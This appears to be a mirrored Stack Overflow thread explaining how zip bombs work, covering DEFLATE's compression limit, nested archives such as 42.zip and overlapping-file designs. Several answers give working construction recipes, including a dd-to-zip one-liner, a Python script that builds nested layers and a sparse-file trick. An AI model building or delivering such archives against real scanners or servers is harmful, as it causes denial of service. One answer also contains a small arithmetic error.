How does one make a Zip bomb?

Tags: Algorithm, Compression

Algorithm Problem Overview


This question about zip bombs naturally led me to the Wikipedia page on the topic. The article mentions an example of a 45.1 KB zip file that decompresses to 1.3 exabytes.

What are the principles/techniques that would be used to create such a file in the first place? I don't want to actually do this, more interested in a simplified "how-stuff-works" explanation of the concepts involved.

The article mentions 9 layers of zip files, so it's not a simple case of zipping a bunch of zeros. Why 9, why 10 files in each?

Algorithm Solutions


Solution 1 - Algorithm

Citing from the Wikipedia page:

> One example of a Zip bomb is the file 45.1.zip which was 45.1 kilobytes of compressed data, containing nine layers of nested zip files in sets of 10, each bottom layer archive containing a 1.30 gigabyte file for a total of 1.30 exabytes of uncompressed data.

So all you need is one single 1.3GB file full of zeroes, compress that into a ZIP file, make 10 copies, pack those into a ZIP file, and repeat this process 9 times.

This way, you get a file which, when uncompressed completely, produces an absurd amount of data without requiring you to start out with that amount.

Additionally, the nested archives make it much harder for programs like virus scanners (the main target of these "bombs") to be smart and refuse to unpack archives that are "too large". Until the last level, the total amount of data is not that much; you don't "see" how large the files at the lowest level are until you have reached that level, and no individual file is "too large" - only the huge number of them is problematic.
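
As a rough sanity check on those numbers (my own sketch, using the layer and copy counts from the quote above), the arithmetic works out like this:

    # Sketch: total expansion of a 42.zip-style bomb as described above.
    # Assumes 9 layers of nesting, 10 copies per layer, 1.30 GB of zeros at the bottom.
    layers = 9
    copies_per_layer = 10
    bottom_file_gb = 1.30

    bottom_files = copies_per_layer ** layers          # 10**9 bottom-level files
    total_gb = bottom_files * bottom_file_gb           # about 1.3 billion GB in total
    print(f"{bottom_files:,} files, ~{total_gb / 1e9:.2f} EB uncompressed")

Each archive you actually look at along the way stays tiny; only the product of all the layers is enormous.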

Solution 2 - Algorithm

Create a 1.3 exabyte file of zeros.

Right click > Send to compressed (zipped) folder.

Solution 3 - Algorithm

This is easily done under Linux using the following command:

dd if=/dev/zero bs=1024 count=10000 | zip zipbomb.zip -

Replace count with the number of KiB you want to compress. The example above creates a zip that expands to roughly 10 MB (not much of a bomb at all, but it shows the process).

You DO NOT need hard disk space to store all the uncompressed data.

Solution 4 - Algorithm

Below is for Windows:

From the Security Focus proof of concept (NSFW!), it's a ZIP file with 16 folders, each with 16 folders, which goes on like so (42 is the zip file name):

> \42\lib 0\book 0\chapter 0\doc 0\0.dll
> ...
> \42\lib F\book F\chapter F\doc F\0.dll

I'm probably wrong about this figure, but it produces 4^16 (4,294,967,296) directories. Because each directory needs allocation space of N bytes, it ends up being huge. The DLL file at the end is 0 bytes.

Unzipping the first directory chain alone, \42\lib 0\book 0\chapter 0\doc 0\0.dll, results in 4 GB of allocation space.

Solution 5 - Algorithm

Serious answer:

(Very basically) Compression relies on spotting repeating patterns, so the zip file would contain data representing something like

0x100000000000000000000000000000000000  
(Repeat this '0' ten trillion times)

Very short zip file, but huge when you expand it.
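
To make that concrete, here is a small sketch (mine, using Python's zlib rather than the zip container itself): a mebibyte of identical bytes collapses to roughly a kilobyte.

    import zlib

    # Highly repetitive input: 1 MiB of zero bytes.
    data = b"\x00" * (1024 * 1024)
    compressed = zlib.compress(data, 9)

    print(len(data), "->", len(compressed), "bytes")   # roughly 1,048,576 -> ~1 KB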

Solution 6 - Algorithm

To create one in a practical setting (i.e. without creating a 1.3 exabyte file on your enormous hard drive), you would probably have to learn the file format at a binary level and write something that translates to what your desired file would look like, post-compression.
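
Short of hand-crafting the container format, a related trick (a sketch of my own, not part of the original answer) is to generate the compressed stream incrementally, feeding zeros into the compressor chunk by chunk so the uncompressed data never has to exist all at once:

    import zlib

    # Stream-compress 1 GiB of zeros without ever materializing the 1 GiB input.
    compressor = zlib.compressobj(9)
    chunk = b"\x00" * (1024 * 1024)           # a single reusable 1 MiB block of zeros

    out_size = 0
    for _ in range(1024):                     # 1024 x 1 MiB = 1 GiB of logical input
        out_size += len(compressor.compress(chunk))
    out_size += len(compressor.flush())

    print("compressed size:", out_size, "bytes")   # on the order of 1 MB

Wrapping that stream in a valid .zip still means writing the local file headers and central directory yourself, which is where knowing the format at a binary level comes in.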

Solution 7 - Algorithm

> The article mentions 9 layers of zip files, so it's not a simple case of zipping a bunch of zeros. Why 9, why 10 files in each?

First off, the Wikipedia article currently says 5 layers with 16 files each. Not sure where the discrepancy comes from, but it's not all that relevant. The real question is why use nesting in the first place.

DEFLATE, the only commonly supported compression method for zip files*, has a maximum compression ratio of 1032. This can be achieved asymptotically for any repeating sequence of 1-3 bytes. No matter what you do to a zip file, as long as it is only using DEFLATE, the unpacked size will be at most 1032 times the size of the original zip file.
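
You can observe that ceiling empirically. Here is a quick sketch (mine, not from the answer) using raw DEFLATE via Python's zlib; on a long run of identical bytes the ratio approaches, but never exceeds, roughly 1032:1.

    import zlib

    data = b"\x00" * (100 * 1024 * 1024)       # 100 MiB of a single repeated byte

    # wbits=-15 selects a raw DEFLATE stream, the same encoding used inside zip files.
    co = zlib.compressobj(level=9, wbits=-15)
    compressed = co.compress(data) + co.flush()

    print(len(data) / len(compressed))         # just under 1032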

Therefore, it is necessary to use nested zip files to achieve really outrageous compression ratios. If you have 2 layers of compression, the maximum ratio becomes 1032^2 = 1065024. For 3, it's 1099104768, and so on. For the 5 layers used in 42.zip, the theoretical maximum compression ratio is 1170572956434432. As you can see, the actual 42.zip is far from that level. Part of that is the overhead of the zip format, and part of it is that they just didn't care.

If I had to guess, I'd say that 42.zip was formed by just creating a large empty file, and repeatedly zipping and copying it. There is no attempt to push the limits of the format or maximize compression or anything - they just arbitrarily picked 16 copies per layer. The point was to create a large payload without much effort.

Note: Other compression formats, such as bzip2, offer much, much, much larger maximum compression ratios. However, most zip parsers don't accept them.

P.S. It is possible to create a zip file which will unzip to a copy of itself (a quine). You can also make one that unzips to multiple copies of itself. Therefore, if you recursively unzip a file forever, the maximum possible size is infinite. The only limitation is that it can grow by a factor of at most 1032 on each iteration.

P.P.S. The 1032 figure assumes that file data in the zip are disjoint. One quirk of the zip file format is that it has a central directory which lists the files in the archive and offsets to the file data. If you create multiple file entries pointing to the same data, you can achieve much higher compression ratios even with no nesting, but such a zip file is likely to be rejected by parsers.

Solution 8 - Algorithm

A nice way to create a zip bomb (or gzip bomb) is to know the binary format you are targeting. Otherwise, even if you use a streaming input (for example /dev/zero), you'll still be limited by the computing power needed to compress the stream.

A nice example of a gzip bomb: http://selenic.com/googolplex.gz (there's a message embedded in the file after several levels of compression, resulting in huge files).

Have fun finding that message :)

Solution 9 - Algorithm

Silicon Valley Season 3 Episode 7 brought me here. The steps to generate a zip bomb would be:

  1. Create a dummy file full of zeros (or ones, if you think they're skinny) of some size, say 1 GB.
  2. Compress this file into a zip file, say 1.zip.
  3. Make n (say 10) copies of this file and add these n files to a compressed archive (say 2.zip).
  4. Repeat step 3 k times.
  5. You'll get a zip bomb.

For a Python implementation, check this.
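
As a rough illustration of those steps, here is a minimal sketch (my own, not the linked implementation; file names, sizes, and counts are arbitrary):

    import zipfile

    COPIES = 10   # n in step 3
    LEVELS = 9    # how many times step 3 is repeated (k in step 4)

    # Steps 1-2: compress a dummy file full of zeros into the innermost archive.
    # (As written this builds ~1 GiB in memory; shrink the size for a quick test.)
    with zipfile.ZipFile("layer0.zip", "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("zeros.bin", b"\x00" * (1024 ** 3))

    # Steps 3-4: repeatedly pack COPIES copies of the previous layer into a new zip.
    prev = "layer0.zip"
    for level in range(1, LEVELS + 1):
        with open(prev, "rb") as f:
            payload = f.read()
        prev = f"layer{level}.zip"
        with zipfile.ZipFile(prev, "w", zipfile.ZIP_DEFLATED) as zf:
            for i in range(COPIES):
                zf.writestr(f"copy{i}.zip", payload)

    print("zip bomb written to", prev)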

Solution 10 - Algorithm

Perhaps, on Unix, you could pipe a certain amount of zeros directly into a zip program or something? I don't know enough about Unix to explain exactly how you would do that, though. Other than that, you would need a source of zeros and pipe them into a zipper that reads from stdin.

Solution 11 - Algorithm

All file compression algorithms rely on the entropy of the information to be compressed: the lower the entropy, the better it compresses. A stream of nothing but 0's or 1's has very low entropy, so if it's long enough, it will compress extremely well.

That's the theory part. The practical part has already been pointed out by others.

Solution 12 - Algorithm

Recent (post-1995) compression algorithms like bz2, lzma (7-zip) and rar give spectacular compression of monotonous files, and a single layer of compression is sufficient to wrap oversized content down to a manageable size.

Another approach could be to create a sparse file of extreme size (exabytes) and then compress it with something mundane that understands sparse files (e.g. tar). If the examiner streams the file, they will need to read past all those zeros that exist only to pad between the actual content; if the examiner writes it to disk, however, very little space will be used (assuming a well-behaved unarchiver and a modern filesystem).
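
A sketch of the sparse-file half of that idea (file name and size are made up): on a filesystem with sparse-file support, seeking far ahead and writing a single byte yields a file with a huge apparent size but almost no allocated blocks.

    import os

    APPARENT_SIZE = 1024 ** 4            # 1 TiB apparent size; adjust to taste

    # Seek to the end and write one byte; the hole in between is never allocated.
    with open("sparse.bin", "wb") as f:
        f.seek(APPARENT_SIZE - 1)
        f.write(b"\x00")

    st = os.stat("sparse.bin")
    print("apparent size:", st.st_size, "bytes")
    print("allocated:", st.st_blocks * 512, "bytes")   # st_blocks is POSIX-only

GNU tar, for example, has a --sparse option for archiving such files efficiently.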

Solution 13 - Algorithm

Tried it. The output was a small 84 KB zip file.

Steps I took so far:

  1. Create a 1.4 GB .txt file full of '0'.
  2. Compress it.
  3. Rename the .zip to .txt, then make 16 copies.
  4. Compress all of them into a .zip file.
  5. Rename the renamed .txt files inside the .zip file back to .zip.
  6. Repeat steps 3 to 5 eight times.
  7. Enjoy :)

Though I don't know how to explain why compressing the renamed zip files still yields a smaller file, it works. Maybe I just lack the technical terms.

Solution 14 - Algorithm

I don't know if ZIP uses Run Length Encoding, but if it did, such a compressed file would contain a small piece of data and a very large run-length value. The run-length value would specify how many times the small piece of data is repeated. When you have a very large value, the resultant data is proportionally large.
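
For what it's worth, here is a toy sketch of that idea (not how zip actually works internally; DEFLATE uses LZ77-style back-references plus Huffman coding rather than plain run-length encoding):

    def rle_encode(data: bytes):
        """Toy run-length encoder: collapse runs into [byte, count] pairs."""
        runs = []
        for b in data:
            if runs and runs[-1][0] == b:
                runs[-1][1] += 1
            else:
                runs.append([b, 1])
        return runs

    # Two numbers stand in for a thousand identical bytes;
    # scale the count up and the decoded output grows proportionally.
    print(rle_encode(b"\x00" * 1000))   # [[0, 1000]]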

Solution 15 - Algorithm

It is not necessary to use nested files; you can take advantage of the zip format to overlay data.

https://www.bamsoftware.com/hacks/zipbomb/

"This article shows how to construct a non-recursive zip bomb that achieves a high compression ratio by overlapping files inside the zip container. "Non-recursive" means that it does not rely on a decompressor's recursively unpacking zip files nested within zip files: it expands fully after a single round of decompression. The output size increases quadratically in the input size, reaching a compression ratio of over 28 million (10 MB → 281 TB) at the limits of the zip format. Even greater expansion is possible using 64-bit extensions. The construction uses only the most common compression algorithm, DEFLATE, and is compatible with most zip parsers."

"Compression bombs that use the zip format must cope with the fact that DEFLATE, the compression algorithm most commonly supported by zip parsers, cannot achieve a compression ratio greater than 1032. For this reason, zip bombs typically rely on recursive decompression, nesting zip files within zip files to get an extra factor of 1032 with each layer. But the trick only works on implementations that unzip recursively, and most do not. The best-known zip bomb, 42.zip, expands to a formidable 4.5 PB if all six of its layers are recursively unzipped, but a trifling 0.6 MB at the top layer. Zip quines, like those of Ellingsen and Cox, which contain a copy of themselves and thus expand infinitely if recursively unzipped, are likewise perfectly safe to unzip once."

Attributions

All content for this solution is sourced from the original question on Stackoverflow.

The content on this page is licensed under the Attribution-ShareAlike 4.0 International (CC BY-SA 4.0) license.

| Content Type | Original Author | Original Content on Stackoverflow |
| --- | --- | --- |
| Question | pufferfish | View Question on Stackoverflow |
| Solution 1 - Algorithm | Michael Borgwardt | View Answer on Stackoverflow |
| Solution 2 - Algorithm | wefwfwefwe | View Answer on Stackoverflow |
| Solution 3 - Algorithm | Thomi | View Answer on Stackoverflow |
| Solution 4 - Algorithm | Chris S | View Answer on Stackoverflow |
| Solution 5 - Algorithm | wefwfwefwe | View Answer on Stackoverflow |
| Solution 6 - Algorithm | Andy_Vulhop | View Answer on Stackoverflow |
| Solution 7 - Algorithm | Antimony | View Answer on Stackoverflow |
| Solution 8 - Algorithm | tonfa | View Answer on Stackoverflow |
| Solution 9 - Algorithm | Abdul Fatir | View Answer on Stackoverflow |
| Solution 10 - Algorithm | Svish | View Answer on Stackoverflow |
| Solution 11 - Algorithm | Calyth | View Answer on Stackoverflow |
| Solution 12 - Algorithm | user340140 | View Answer on Stackoverflow |
| Solution 13 - Algorithm | jaycroll | View Answer on Stackoverflow |
| Solution 14 - Algorithm | Joe | View Answer on Stackoverflow |
| Solution 15 - Algorithm | user15278861 | View Answer on Stackoverflow |